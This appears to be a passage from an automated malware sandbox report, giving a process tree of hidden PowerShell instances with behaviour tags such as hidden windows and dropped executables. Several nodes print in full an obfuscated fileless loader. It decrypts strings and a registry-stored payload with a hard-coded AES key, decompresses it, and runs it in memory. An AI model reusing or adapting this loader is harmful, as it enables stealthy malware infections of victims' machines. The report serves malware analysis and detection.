= $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5532
                                                                                                                            • C:\Windows\$sxr-powershell.exe
                                                                                                                              "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5532).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Hide Artifacts: Hidden Window
                                                                                                                              PID:6812
                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5648
                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5764
